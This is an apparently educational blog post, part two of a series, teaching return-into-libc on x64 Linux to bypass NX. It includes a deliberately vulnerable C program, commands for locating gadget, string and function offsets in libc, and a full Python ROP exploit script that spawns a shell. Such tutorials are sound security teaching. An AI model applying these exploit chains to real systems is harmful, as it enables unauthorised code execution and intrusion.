Introduction to x64 Linux Binary Exploitation (Part 2)—return into libc
This post is the second one of a series of articles, where I describe some basic x64 Linux Binary Exploitation techniques. In Part 1 I started by disabling ASLR, NX, Stack Canaries and Fortify so as I promised, in this one I will enable NX in order to demonstrate the return-into-libc attack by exploiting a buffer overflow vulnerability.
Before we start, you can use the links bellow to navigate to the rest of the other parts:
Definitions
Lets start with some relative definitions:
Code Reuse Attack: A Code Reuse Attack is an exploitation technique which after gaining control of the instruction pointer, redirects the executable’s control flow to existing code that suits the attacker’s needs.
Return-into-library and Pre-existing Instruction Sequences (gadgets) are examples of the particular technique.
NX or XD bit: The NX (no-execute) or XD (eXecute Disabled) bit is a technology used in CPUs to segregate areas of memory for use by either storage of processor instructions (code) or for storage of data [1].
As I demonstrated in the previous part, using a BoF, it is possible to insert arbitrary code into the memory of a program. Marking these memory areas, explicitly for data storage an attempt to execute the injected code will cause an exception. Some Unix operating systems (e.g. OpenBSD, macOS) ship with executable space protection, while newer versions of Microsoft Windows also support executable space protection, called Data Execution Prevention [2].
Return into libc
The particular attack makes use of code which exists in the always-present C library (libc). For the sake of simplicity, assuming that we already have control over the RIP register, then instead of redirecting the control to some memory location in the stack, we will force a call to a carefully chosen existing function which serves our needs as an attacker (e.g. to spawn a shell).
As mentioned before libc is a very popular target for these type of attacks as it contains almost every C function while all of these function can be accessed as they are exported. One of these functions is the system(), which has the following syntax:
int system(const char *command)
This C library function sets the command or program name which is specified by the command parameter to the host environment to be executed by the command processor and returns after the command has been completed. This being said, the following program will simply spawn a shell:
Assuming that by using a vulnerability we are able to overwrite the RIP register, we still have two issues to overcome:
- Find the system() function address
- Pass arguments to this function
- Find the exit() function address, to close the program cleanly
To answer these questions, let’s first see how the execution flow is transferred to the system() function in the context of a valid function call. To do this, compile the program above ($gcc system.c -o system), and load it to the debugger:
Notice the call at the system() function (0x0000000000001158) and before that the lea rdi,[rip+0xeac] # 0x2004 instruction. Remember from Part 1 that:
In the C calling conversion up to six arguments will be placed to the RDI, RSI, RDX, RCX, R8 and R9 registers and anything additional will be placed in to the stack.
In the particular call, the parameter “/bin/sh” will be passed to the RDI register. Indeed, by typing x/s 0x2004 (or x/s 0x555555556004 in my case since I am already running the program) to view the strings at this memory location, we have the following output:
Or on a better view:
Back to our vulnerable program from Part 1:
After the returning from the greet_me function the stack must look like bellow:
1 → Place adequate data to overflow the buffer and overwrite the $rbp register
2 → Overwrite the RIP register in order to point to a POP RDI instruction followed by a RET, this way what ever is on top of the stack (in our case it will be the “/bin/sh” string) will be passed to the RDI register and the RET will pop the stack placing the next instruction address to the RIP register→3.
4 → The stack contains the address of the system() function which will be passed to the RIP (due to the RET from the previous step).
5 → When the system() function returns, the RIP register will point to the exit() function, in order to exit our program cleanly.
For those familiar with binary exploitation, this POP RDI, RET instruction sequence already rings a bell, for the rest of you, here is a relevant definition:
ROP (Return Oriented Programming) techniques aim to hijack a program’s stack (often through a stack- based buffer overflow) to place a carefully crafted sequence of return addresses and data into the stack. At some point after the overflow, the program begins using the attacker-supplied return addresses rather than return addresses placed on the stack by normal program execution. The return addresses the attacker places on the stack point to program memory locations that already contain code as a result of normal program and library loading operations [3].
A ROP gadget is a short sequence of machine instructions typically ending to a return instruction, which aims to perform a very simple task (e.g. loading a register from the stack). The following simple gadget could be used to initialise RAX on an x86–64 system [3]:
POP RAX ; pop the next item on the stack into RAX
RET ; transfer control to the address contained in the next stack item
A fairly accurate visualisation of the return oriented programming concept is depicted bellow:
A vulnerable program
Once again we are going to overflow the name buffer as we did in Part 1, with the only difference that this time we are going to use the gets C function as we are going to use ‘\00’ bytes in our input. Additionally we are going to omit the -z execstack parameter during the compilation in order to render the stack as not executable. The compilation command should now look as bellow:
$gcc -fno-stack-protector vuln.c -o vuln -D_FORTIFY_SOURCE=0
If you recall the previous post, we used 208 bytes to overflow the name buffer + 8 bytes to overwrite the RBP + 8 Bytes to overwrite RIP. The injected code was included in those 208 bytes in addition to a NOP sled of 30 bytes.
Let’s remove the shellcode and NOP sled from the exploitation script since we are not going to use them. The script should look like bellow:
import sys
import structbuf = b”A”* 208
buf += b”BBBBBBBB” #RBP overwrite
buf += struct.pack(‘<Q’,0x7fffffffde18) #RIP overwritesys.stdout.buffer.write(buf)
Crafting the exploit string
Using the stack-map from the previous paragraph, we will start by finding the address of a POP RDI, RET gadget in libc:
- Locate the libc library file:
- Locate a the gadget (in libc):
There are various tools that can be used for this purpose, in this case we are going to use https://github.com/sashs/Ropper:
Keep a note of the offset 0x26b72 and let’s move to the next step
- Scan the entire libc file for a string “/bin/sh” and print the location of the string in base 16:
$ strings -a -t x /usr/lib/libc.so.6 | grep /bin/sh1b75aa /bin/sh
Keep a note of the offset 0x1b75aa and let’s move to the next step
- Locate a the system() function using readelf:
$ readelf -s libc-2.31.so | grep system
....
1427: 0000000000055410 45 FUNC WEAK DEFAULT 16 system@@GLIBC_2.2.5
Keep a note of the offset 0x55410 and let’s move to the next step
- Similarly to system() locate a the exit() function using readelf:
$ readelf -s libc-2.31.so | grep exit
...
135: 0000000000049bc0 32 FUNC GLOBAL DEFAULT 16 exit@@GLIBC_2.2.5
Keep a note of the offset 0x49bc0 and let’s move to the next step
- Find the base address of the libc function:
As you understand, the offsets that we discovered above will be added to the address where the libc will be loaded. Since ASLR is disabled, this address will be the same every time that we run the vulnerable program and can be found by examining the process’s memory allocation:
Keep a note of the offset 0x00007ffff7dc5000
And let’s now modify the exploit script:
Ignore Lines 5 and 13 for now and notice the buf variable (Lines 11 to 17) which corresponds to the stack map we initially planed. If we try to use this exploit, we will still get a segmentation fault… but not a shell:
The 16 Bytes Stack Alignment
If we debug the vulnerable program using the exploit mentioned above and we set a breakpoint at the return instruction of the greet_me function, we have the following:
1 → RBP has been overwritten, 2 → the next instruction (ret) will pop the address at the top of the stack to RIP (3) and the POP RDI, RET will be executed placing the “/bin/sh” (3) to the RDI register. While everything works as expected, by letting the program to continue we land to the following instruction:
The 64 bit calling convention requires the stack to be 16-byte aligned before a call
instruction but this is easily violated during ROP chain execution, causing all further calls from that function to be made with a misaligned stack. movaps
triggers a general protection fault when operating on unaligned data, so try padding your ROP chain with an extra ret
before returning into a function or return further into a function to skip a push
instruction [4]. We can find an extra RET instruction address in the libc file, following exactly the process we did in the POP RDI, RET gadget (using the ropper or a similar tool). The final exploitation script will be as follows:
import sys
import structlibc_base_address = 0x7ffff7dc5000
ret = libc_base_address+0xc0533
pop_rdi = libc_base_address + 0x26b72
bin_sh = libc_base_address + 0x1b75aa
system_function = libc_base_address + 0x55410
exit_function = libc_base_address + 0x49bc0buf = b”A”* 208
buf += b”BBBBBBBB”
buf += struct.pack(‘<Q’,ret)
buf += struct.pack(‘<Q’,pop_rdi)
buf += struct.pack(‘<Q’,bin_sh)
buf += struct.pack(‘<Q’,system_function)
buf += struct.pack(‘<Q’,exit_function)sys.stdout.buffer.write(buf)
Running the vulnerable program using the output produced by the script above we finally get the shell:
Summary
In this part we enabled the NX protection and we used a technique, known as return into libc in order to bypass it. In Part 3 we will keep the same level of protection in order to demonstrate an additional bypassing technique which will allow us to execute code in the stack even when the NX protection has been enabled.
References:
[1] https://en.wikipedia.org/wiki/NX_bit
[2] https://en.wikipedia.org/wiki/Buffer_overflow
[3] The Ghidra Book: The Definitive Guide, Chris Eagle, Kara Nance, September 2020